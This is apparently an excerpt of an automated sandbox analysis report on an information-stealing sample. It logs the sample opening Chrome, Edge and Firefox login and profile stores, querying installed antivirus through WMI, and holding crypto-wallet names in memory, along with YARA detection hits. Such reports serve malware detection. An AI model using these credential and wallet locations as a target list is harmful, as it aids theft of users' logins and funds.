              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
              Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
              Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
              Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
              Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AEFD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF70AEFD080
              Source: C:\Users\user\Desktop\cmd.exe | Code function: 0_2_00007FF70AF15C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF70AF15C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe | Code function: 65_2_00007FF69A4248CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,65_2_00007FF69A4248CC
              Source: C:\Users\user\Desktop\cmd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000001.00000002.2096102942.000001C916489000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1701296843.00000162C4354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2098275549.000001C916C2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1701296843.00000162C4352000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2090937481.000001C917404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7264, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key, type: DROPPED
              Source: Yara match | File source: Process Memory Space: cmd.exe PID: 7280, type: MEMORYSTR
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Electrum
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxxz
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Exodusz
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: EthereumZ
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystoreZ
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
